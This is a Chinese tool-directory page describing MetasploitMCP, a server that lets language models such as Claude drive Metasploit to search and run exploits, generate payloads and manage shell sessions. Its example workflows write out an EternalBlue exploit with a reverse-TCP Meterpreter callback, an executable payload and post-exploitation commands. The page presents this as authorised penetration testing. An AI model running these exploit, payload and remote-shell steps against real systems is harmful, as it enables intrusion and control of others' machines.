MetasploitMCP

GitHub
563 163 较难 1 次阅读 3天前Apache-2.0Agent插件
AI 解读 由 AI 自动生成,仅供参考

MetasploitMCP 是一座连接大型语言模型(如 Claude)与 Metasploit 渗透测试框架的智能桥梁。它通过模型上下文协议(MCP),让 AI 助手能够直接理解并执行复杂的安全测试指令,将原本需要手动输入的命令转化为自然的对话交互。

这一工具主要解决了安全测试流程门槛高、操作繁琐的问题。传统渗透测试需要专业人员熟记大量模块命令和参数,而 MetasploitMCP 允许用户用通俗语言描述需求,AI 即可自动调用漏洞利用、载荷生成、会话管理及监听器控制等核心功能,大幅提升了工作流的效率与灵活性。

该工具专为网络安全研究人员、渗透测试工程师及安全开发者设计。需要注意的是,由于其直接操控强大的攻击模拟功能,使用者必须具备相应的专业资质,并严格仅在获得授权的环境中进行测试。

其技术亮点在于标准化的工具集成能力,不仅支持搜索漏洞和载荷模块,还能动态配置并执行攻击任务、管理后台会话及生成恶意载荷文件。同时,它灵活支持 HTTP/SSE 和 STDIO 两种传输模式,既能适配本地桌面端 AI 应用,也能部署为远程服务,为构建自动化安全运营体系提供了坚实的技术基础。

使用场景

某安全团队在对内部测试网段进行紧急漏洞验证时,需要快速评估多台服务器的风险暴露面。

没有 MetasploitMCP 时

  • 分析师需在终端手动输入冗长的 msfconsole 命令查找模块,频繁切换上下文导致操作中断。
  • 编写批量测试脚本门槛高,难以根据实时扫描结果动态调整攻击载荷(Payload)参数。
  • 会话管理依赖人工监控,容易遗漏后台活跃的 Shell 连接,增加被检测风险。
  • 从发现漏洞到生成报告周期长,因为需要手动截图、复制命令输出并整理文档。
  • 新手成员因不熟悉复杂的 Metasploit 指令体系,难以独立承担渗透测试任务。

使用 MetasploitMCP 后

  • 分析师直接通过自然语言让 MetasploitMCP 搜索并列出适用模块,无需记忆繁琐命令语法。
  • 利用 AI 自动调用 generate_payloadrun_exploit 接口,根据目标架构即时生成并执行定制化攻击。
  • MetasploitMCP 实时监控活动会话,支持一键发送指令或终止可疑连接,实现精细化管控。
  • 整个测试流程由 AI 辅助记录,自动汇总执行步骤与结果,大幅缩短报告撰写时间。
  • 初级人员通过对话式交互即可驱动专业工具,降低了渗透测试的操作门槛和学习曲线。

MetasploitMCP 将复杂的命令行渗透工作流转化为直观的自然语言交互,显著提升了安全测试的效率与可访问性。

运行环境要求

操作系统
  • Linux
  • macOS
  • Windows
GPU

未说明

内存

未说明

依赖
notes必须预先安装 Metasploit Framework 并启动 msfrpcd 服务。该工具本身不依赖 GPU,主要用于渗透测试流程的自动化控制。支持 HTTP/SSE 和 STDIO 两种传输模式。生成 Payload 时需配置保存目录环境变量。
python3.10+
msfrpc-client (隐含)
pytest (测试用)
pytest-asyncio (测试用)
MetasploitMCP hero image

快速开始

Metasploit MCP 服务器

用于集成 Metasploit 框架的模型上下文协议 (MCP) 服务器。

https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1

描述

该 MCP 服务器为大型语言模型(如 Claude)与 Metasploit 框架渗透测试平台之间提供桥梁。它允许 AI 助手通过标准化工具动态访问和控制 Metasploit 的功能,从而实现对复杂安全测试工作流的自然语言接口。

特性

模块信息

  • list_exploits: 搜索并列出可用的 Metasploit 漏洞利用模块
  • list_payloads: 搜索并列出可用的 Metasploit payload 模块,并可选择按平台和架构进行过滤

漏洞利用流程

  • run_exploit: 配置并针对目标执行漏洞利用,可选择先运行检查
  • run_auxiliary_module: 运行任何带有自定义选项的 Metasploit 辅助模块
  • run_post_module: 对现有会话执行后渗透模块

Payload 生成

  • generate_payload: 使用 Metasploit RPC 生成 payload 文件(保存到本地)

会话管理

  • list_active_sessions: 显示当前的 Metasploit 会话及其详细信息
  • send_session_command: 在活动的 shell 或 Meterpreter 会话中执行命令
  • terminate_session: 强制结束活动会话

处理器管理

  • list_listeners: 显示所有活动的监听器和后台作业
  • start_listener: 创建一个新的 multi/handler 监听器以接收连接
  • stop_job: 终止任何正在运行的作业或监听器

先决条件

  • 已安装 Metasploit 框架并运行 msfrpcd
  • Python 3.10 或更高版本
  • 必要的 Python 包(参见 requirements.txt)

安装

  1. 克隆本仓库
  2. 安装依赖:
    pip install -r requirements.txt
    
  3. 配置环境变量(可选):
    MSF_PASSWORD=yourpassword
    MSF_SERVER=127.0.0.1
    MSF_PORT=55553
    MSF_SSL=false
    PAYLOAD_SAVE_DIR=/path/to/save/payloads  # 可选:生成的 payload 保存路径
    

使用方法

启动 Metasploit RPC 服务:

msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553

传输方式

服务器支持两种传输方式:

  • HTTP/SSE(服务器发送事件):默认模式,便于与大多数 MCP 客户端互操作
  • STDIO(标准输入/输出):用于 Claude Desktop 等直接管道连接

可通过 --transport 标志显式选择传输模式:

# 使用 HTTP/SSE 传输(默认)
python MetasploitMCP.py --transport http

# 使用 STDIO 传输
python MetasploitMCP.py --transport stdio

HTTP 模式的附加选项:

python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085

Claude Desktop 集成

对于 Claude Desktop 集成,请配置 claude_desktop_config.json

{
    "mcpServers": {
        "metasploit": {
            "command": "uv",
            "args": [
                "--directory",
                "C:\\path\\to\\MetasploitMCP",
                "run",
                "MetasploitMCP.py",
                "--transport",
                "stdio"
            ],
            "env": {
                "MSF_PASSWORD": "yourpassword"
            }
        }
    }
}

其他 MCP 客户端

对于使用 HTTP/SSE 的其他 MCP 客户端:

  1. 以 HTTP 模式启动服务器:
    python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
    
  2. 配置您的 MCP 客户端连接至:
    • SSE 端点:http://your-server-ip:8085/sse

安全注意事项

⚠️ 重要安全警告

该工具提供了对 Metasploit 框架功能的直接访问权限,其中包括强大的漏洞利用功能。请谨慎使用,仅在您获得明确授权的安全测试环境中使用。

  • 始终在执行前验证并审查所有命令
  • 仅在隔离的测试环境或获得适当授权的情况下运行
  • 请注意,后渗透命令可能导致系统发生重大修改

示例工作流

基本漏洞利用

  1. 列出可用的漏洞:list_exploits("ms17_010")
  2. 选择并运行一个漏洞:run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})
  3. 列出会话:list_active_sessions()
  4. 执行命令:send_session_command(1, "whoami")

后渗透

  1. 运行后渗透模块:run_post_module("windows/gather/enum_logged_on_users", 1)
  2. 发送自定义命令:send_session_command(1, "sysinfo")
  3. 完成后终止会话:terminate_session(1)

处理器管理

  1. 启动监听器:start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
  2. 列出活动监听器:list_listeners()
  3. 生成 payload:generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
  4. 停止监听器:stop_job(1)

测试

该项目包含全面的单元测试和集成测试,以确保可靠性和可维护性。

测试先决条件

安装测试依赖:

pip install -r requirements-test.txt

或者使用便捷的安装脚本:

python run_tests.py --install-deps
# OR
make install-deps

运行测试

快速命令

# 运行所有测试
python run_tests.py --all
# OR
make test

# 带覆盖率报告运行
python run_tests.py --all --coverage
# OR
make coverage

# 带 HTML 覆盖率报告运行
python run_tests.py --all --coverage --html
# OR
make coverage-html

特定测试套件

# 仅运行单元测试
python run_tests.py --unit
# OR
make test-unit

# 仅运行集成测试  
python run_tests.py --integration
# OR
make test-integration

# 选项解析测试
python run_tests.py --options
# OR
make test-options

# 辅助函数测试
python run_tests.py --helpers
# OR
make test-helpers

# MCP 工具测试
python run_tests.py --tools
# OR
make test-tools

测试选项

# 包含慢速测试
python run_tests.py --all --slow

# 包含网络测试(需要实际网络)
python run_tests.py --all --network

# 详细输出
python run_tests.py --all --verbose

# 快速测试(无覆盖率,快速失败)
make quick-test

# 调试模式(详细失败信息)
make test-debug

测试结构

  • tests/test_options_parsing.py:优雅选项解析功能的单元测试
  • tests/test_helpers.py:内部辅助函数和 MSF 客户端管理的单元测试
  • tests/test_tools_integration.py:所有 MCP 工具与模拟 Metasploit 后端的集成测试
  • conftest.py:共享的测试夹具和配置
  • pytest.ini:包含覆盖率设置的 Pytest 配置

测试特性

  • 全面的模拟:所有 Metasploit 依赖项均被模拟,因此测试无需实际安装 MSF 即可运行。
  • 异步支持:使用 pytest-asyncio 提供完整的 async/await 测试支持。
  • 覆盖率报告:生成详细的覆盖率分析,并以 HTML 格式呈现。
  • 参数化测试:高效测试多种输入场景。
  • 夹具管理:为常见设置场景提供可重用的测试夹具。

覆盖率报告

运行带覆盖率的测试后,报告可在以下位置查看:

  • 终端:测试运行结束后显示覆盖率摘要。
  • HTMLhtmlcov/index.html(使用 --html 选项时)。

CI/CD 集成

用于持续集成:

# 适合 CI 的测试命令
make ci-test
# 或者
python run_tests.py --all --coverage --verbose

配置选项

有效载荷保存目录

默认情况下,使用 generate_payload 生成的有效载荷会保存到用户主目录下的 payloads 目录中(例如 ~/payloadsC:\Users\YourUsername\payloads)。您可以通过设置 PAYLOAD_SAVE_DIR 环境变量来自定义该路径。

设置环境变量的方法:

  • Windows (PowerShell)

    $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
    
  • Windows (命令提示符)

    set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
    
  • Linux/macOS

    export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
    
  • 在 Claude Desktop 配置中

    "env": {
        "MSF_PASSWORD": "yourpassword",
        "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads"  // 仅当需要覆盖默认值时添加
    }
    

注意: 如果您指定了自定义路径,请确保该路径已存在,或应用程序具有创建该路径的权限。如果路径无效,有效载荷生成可能会失败。

许可证

Apache 2.0

常见问题

相似工具推荐

stable-diffusion-webui

stable-diffusion-webui 是一个基于 Gradio 构建的网页版操作界面,旨在让用户能够轻松地在本地运行和使用强大的 Stable Diffusion 图像生成模型。它解决了原始模型依赖命令行、操作门槛高且功能分散的痛点,将复杂的 AI 绘图流程整合进一个直观易用的图形化平台。 无论是希望快速上手的普通创作者、需要精细控制画面细节的设计师,还是想要深入探索模型潜力的开发者与研究人员,都能从中获益。其核心亮点在于极高的功能丰富度:不仅支持文生图、图生图、局部重绘(Inpainting)和外绘(Outpainting)等基础模式,还独创了注意力机制调整、提示词矩阵、负向提示词以及“高清修复”等高级功能。此外,它内置了 GFPGAN 和 CodeFormer 等人脸修复工具,支持多种神经网络放大算法,并允许用户通过插件系统无限扩展能力。即使是显存有限的设备,stable-diffusion-webui 也提供了相应的优化选项,让高质量的 AI 艺术创作变得触手可及。

162.1k|★★★☆☆|今天
开发框架图像Agent

everything-claude-code

everything-claude-code 是一套专为 AI 编程助手(如 Claude Code、Codex、Cursor 等)打造的高性能优化系统。它不仅仅是一组配置文件,而是一个经过长期实战打磨的完整框架,旨在解决 AI 代理在实际开发中面临的效率低下、记忆丢失、安全隐患及缺乏持续学习能力等核心痛点。 通过引入技能模块化、直觉增强、记忆持久化机制以及内置的安全扫描功能,everything-claude-code 能显著提升 AI 在复杂任务中的表现,帮助开发者构建更稳定、更智能的生产级 AI 代理。其独特的“研究优先”开发理念和针对 Token 消耗的优化策略,使得模型响应更快、成本更低,同时有效防御潜在的攻击向量。 这套工具特别适合软件开发者、AI 研究人员以及希望深度定制 AI 工作流的技术团队使用。无论您是在构建大型代码库,还是需要 AI 协助进行安全审计与自动化测试,everything-claude-code 都能提供强大的底层支持。作为一个曾荣获 Anthropic 黑客大奖的开源项目,它融合了多语言支持与丰富的实战钩子(hooks),让 AI 真正成长为懂上

139k|★★☆☆☆|今天
开发框架Agent语言模型

ComfyUI

ComfyUI 是一款功能强大且高度模块化的视觉 AI 引擎,专为设计和执行复杂的 Stable Diffusion 图像生成流程而打造。它摒弃了传统的代码编写模式,采用直观的节点式流程图界面,让用户通过连接不同的功能模块即可构建个性化的生成管线。 这一设计巧妙解决了高级 AI 绘图工作流配置复杂、灵活性不足的痛点。用户无需具备编程背景,也能自由组合模型、调整参数并实时预览效果,轻松实现从基础文生图到多步骤高清修复等各类复杂任务。ComfyUI 拥有极佳的兼容性,不仅支持 Windows、macOS 和 Linux 全平台,还广泛适配 NVIDIA、AMD、Intel 及苹果 Silicon 等多种硬件架构,并率先支持 SDXL、Flux、SD3 等前沿模型。 无论是希望深入探索算法潜力的研究人员和开发者,还是追求极致创作自由度的设计师与资深 AI 绘画爱好者,ComfyUI 都能提供强大的支持。其独特的模块化架构允许社区不断扩展新功能,使其成为当前最灵活、生态最丰富的开源扩散模型工具之一,帮助用户将创意高效转化为现实。

107.7k|★★☆☆☆|2天前
开发框架图像Agent

ML-For-Beginners

ML-For-Beginners 是由微软推出的一套系统化机器学习入门课程,旨在帮助零基础用户轻松掌握经典机器学习知识。这套课程将学习路径规划为 12 周,包含 26 节精炼课程和 52 道配套测验,内容涵盖从基础概念到实际应用的完整流程,有效解决了初学者面对庞大知识体系时无从下手、缺乏结构化指导的痛点。 无论是希望转型的开发者、需要补充算法背景的研究人员,还是对人工智能充满好奇的普通爱好者,都能从中受益。课程不仅提供了清晰的理论讲解,还强调动手实践,让用户在循序渐进中建立扎实的技能基础。其独特的亮点在于强大的多语言支持,通过自动化机制提供了包括简体中文在内的 50 多种语言版本,极大地降低了全球不同背景用户的学习门槛。此外,项目采用开源协作模式,社区活跃且内容持续更新,确保学习者能获取前沿且准确的技术资讯。如果你正寻找一条清晰、友好且专业的机器学习入门之路,ML-For-Beginners 将是理想的起点。

85k|★★☆☆☆|今天
图像数据工具视频

ragflow

RAGFlow 是一款领先的开源检索增强生成(RAG)引擎,旨在为大语言模型构建更精准、可靠的上下文层。它巧妙地将前沿的 RAG 技术与智能体(Agent)能力相结合,不仅支持从各类文档中高效提取知识,还能让模型基于这些知识进行逻辑推理和任务执行。 在大模型应用中,幻觉问题和知识滞后是常见痛点。RAGFlow 通过深度解析复杂文档结构(如表格、图表及混合排版),显著提升了信息检索的准确度,从而有效减少模型“胡编乱造”的现象,确保回答既有据可依又具备时效性。其内置的智能体机制更进一步,使系统不仅能回答问题,还能自主规划步骤解决复杂问题。 这款工具特别适合开发者、企业技术团队以及 AI 研究人员使用。无论是希望快速搭建私有知识库问答系统,还是致力于探索大模型在垂直领域落地的创新者,都能从中受益。RAGFlow 提供了可视化的工作流编排界面和灵活的 API 接口,既降低了非算法背景用户的上手门槛,也满足了专业开发者对系统深度定制的需求。作为基于 Apache 2.0 协议开源的项目,它正成为连接通用大模型与行业专有知识之间的重要桥梁。

77.1k|★★★☆☆|昨天
Agent图像开发框架

OpenHands

OpenHands 是一个专注于 AI 驱动开发的开源平台,旨在让智能体(Agent)像人类开发者一样理解、编写和调试代码。它解决了传统编程中重复性劳动多、环境配置复杂以及人机协作效率低等痛点,通过自动化流程显著提升开发速度。 无论是希望提升编码效率的软件工程师、探索智能体技术的研究人员,还是需要快速原型验证的技术团队,都能从中受益。OpenHands 提供了灵活多样的使用方式:既可以通过命令行(CLI)或本地图形界面在个人电脑上轻松上手,体验类似 Devin 的流畅交互;也能利用其强大的 Python SDK 自定义智能体逻辑,甚至在云端大规模部署上千个智能体并行工作。 其核心技术亮点在于模块化的软件智能体 SDK,这不仅构成了平台的引擎,还支持高度可组合的开发模式。此外,OpenHands 在 SWE-bench 基准测试中取得了 77.6% 的优异成绩,证明了其解决真实世界软件工程问题的能力。平台还具备完善的企业级功能,支持与 Slack、Jira 等工具集成,并提供细粒度的权限管理,适合从个人开发者到大型企业的各类用户场景。

70.6k|★★★☆☆|今天
语言模型Agent开发框架